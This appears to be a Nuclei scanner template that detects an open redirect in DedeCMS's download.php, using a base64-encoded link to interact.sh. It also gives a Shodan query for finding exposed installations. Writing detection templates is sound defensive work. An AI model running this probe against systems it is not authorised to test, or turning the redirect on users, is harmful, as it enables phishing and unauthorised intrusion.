38 lines
1.2 KiB
YAML
38 lines
1.2 KiB
YAML
id: dedecms-openredirect
|
|
|
|
info:
|
|
name: DedeCMS - Open Redirect
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: DedeCMS contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
|
reference:
|
|
- https://blog.csdn.net/ystyaoshengting/article/details/82734888
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cwe-id: CWE-601
|
|
cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.html:"power by dedecms" || title:"dedecms"
|
|
product: dedecms
|
|
vendor: dedecms
|
|
tags: dedecms,redirect
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA=="
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "Location: https://interact.sh"
|
|
part: header
|
|
|
|
- type: status
|
|
status:
|
|
- 302
|
|
# digest: 4a0a00473045022071c49857f72571277903fde4234643ee0dae64ede9485990fb86a2fb56cc35ee022100fc53cc7ce470cf34377cdaf93d9843b5eafc46b336707e4228e69eb869ce2668:922c64590222798bb761d5b6d8e72950 |